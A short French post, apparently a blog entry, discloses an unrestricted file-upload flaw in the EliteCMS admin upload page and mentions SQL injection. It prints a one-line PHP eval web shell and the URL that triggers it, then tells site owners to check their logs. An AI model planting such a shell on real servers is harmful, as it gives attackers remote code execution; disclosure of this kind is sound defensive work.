EliteCMS comme son nom l’indique est un CMS qui se veut léger. Mais pas très sécure.
On vient de découvrir un paquet de failles de conception sur ce CMS qui date de 2008.
En voici une pour l’exemple mais y a même des injections SQL disponible
Sur la page /admin/manage_upload.php ont peut faire uploader un peu ce que l on veut.
Par exemple un fichier shell.php avec ca dedans :
<?php @eval($_GET['key']);?>
que l’on pourrait appeler ensuite avec cette url :
http://urldelacible/upload/shell.php?key=phpinfo();
Je vous laisse donc imaginer tout ce que l’on peut faire avec ce type de faille de cybersécurité.
Si vous avez ce genre de site épluchez vos logs.
